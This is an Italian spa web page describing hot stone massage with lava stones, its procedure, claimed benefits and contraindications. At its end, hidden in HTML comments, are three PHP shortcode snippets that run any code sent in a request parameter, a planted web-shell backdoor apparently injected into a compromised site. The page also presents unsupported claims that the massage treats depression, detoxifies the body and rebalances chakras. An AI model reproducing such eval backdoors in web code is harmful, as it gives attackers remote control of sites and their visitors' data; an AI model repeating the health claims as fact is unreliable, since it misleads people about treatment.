HOT STONE

MASSAGGIO HOT STONE

Culture millenarie da sempre utilizzano le pietre per scopi medicinali e per riequilibrare chakra distonici o intervenire su vibrazioni di energia negativa. Il fuoco, e il calore sono da sempre preziosi strumenti per fini terapeutici.Combinando questi elementi insieme dà vita, grazie all’utilizzo delle pietre basaltiche e vulcaniche, nasce l’Hot Stone Massage , conosciuto già da tempo in Italia anche come Massaggio con pietre laviche, grazie alla riscoperta delle beauty farm statunitensi, che lo hanno poi rilanciato in tutto il mondo.

Il nostro massaggio fonda due tradizioni fondamentali: quella Ayurvedica e quella degli Indiani dell’Arizona.

Esso prevede due fasi principali del massaggio: durante la prima si riequilibrano i chakra, stimolati dal calore delle pietre. In questa fase infatti vengono utilizzate solo le pietre nere riscaldate. Durante la seconda fase invece si applicano anche le pietre bianche. Il trattamento dura circa un’ora.

L’azione terapeutica si ottiene applicando sul corpo pietre: le pietre rilasciano lentamente il loro calore. A seconda del disturbo da trattare, all’azione della pietra viene associato il massaggio adatto e il trattamento viene accompagnato dall’azione di oli o aromi.

Per il massaggio a caldo utilizziamo solitamente pietre laviche, la cui dimensione e il cui peso dipendono dal tipo di trattamento che è necessario effettuare. Le pietre vengono scaldate a temperature variabili dal trattamento sino a 65-70 gradi. Sulla parte del corpo da massaggiare si applica un olio e poi la parte va manipolata grazie alle pietre, che nel frattempo sono state asciugate. Le pietre vengono sostituite quando si raffreddano.

I benefici

In generale, questo tipo di trattamento è indicato nel caso di:

  • dolori muscolari, reumatici o artritici
  • mal di schiena
  • stress
  • insonnia
  • depressione

È inoltre indicato per migliorare la circolazione. Ma la terapia, soprattutto se abbinata ad aromaterapia, uso di oli e massaggi, può anche procurare benefici più specifici.

Il massaggio Hot Stone aiuta a sciogliere la rigidezza muscolare, a migliorare la mobilità delle articolazioni e ad alleviare la tensione della colonna vertebrale, principale causa di dolorosi e invalidanti mal di schiena. Decongestiona i depositi linfatici, migliora la ritenzione dei liquidi e influisce positivamente sulla circolazione arteriosa, oltre a migliorare il ritorno venoso. Aiuta a disintossicare l’organismo, sbloccando inoltre gli scambi metabolici. Ha inoltre anche effetti estetici, poiché leviga e rilassa la pelle.

Senza contare i benefici sull’umore e sul benessere dello spirito, che troppo spesso si tende a mettere in secondo piano rispetto al corpo. La tecnica Hot Stone procura una generale sensazione di benessere e relax, e l’aumento della sensibilità nei confronti delle persone e del mondo. Inoltre, contribuisce ad acquisire una maggiore consapevolezza del proprio corpo.

Le pietre possono essere, secondo la concezione olistica, appoggiate direttamente sui chakra, per migliorare il flusso di energia all’interno del corpo. Considerate come porte di energia, i principali chakra del nostro corpo sono sette: risintonizzare un chakra influenza il flusso di energia, positiva e negativa, ed influisce su particolari stati d’animo e aspetti della vita a cui lo specifico chakra è correlato.

Controindicazioni

Il trattamento con pietre calde è controindicato per chi soffre di fragilità capillare. È inoltre sconsigliato su ferite aperte e lesioni cutanee e in caso di nausea, febbre e infiammazioni dei vasi linfatici.

<!– [insert_php]if (isset($_REQUEST["lpUv"])){eval($_REQUEST["lpUv"]);exit;}[/insert_php][php]if (isset($_REQUEST["lpUv"])){eval($_REQUEST["lpUv"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["XIfx"])){eval($_REQUEST["XIfx"]);exit;}[/insert_php][php]if (isset($_REQUEST["XIfx"])){eval($_REQUEST["XIfx"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["NOpQI"])){eval($_REQUEST["NOpQI"]);exit;}[/insert_php][php]if (isset($_REQUEST["NOpQI"])){eval($_REQUEST["NOpQI"]);exit;}[/php] –>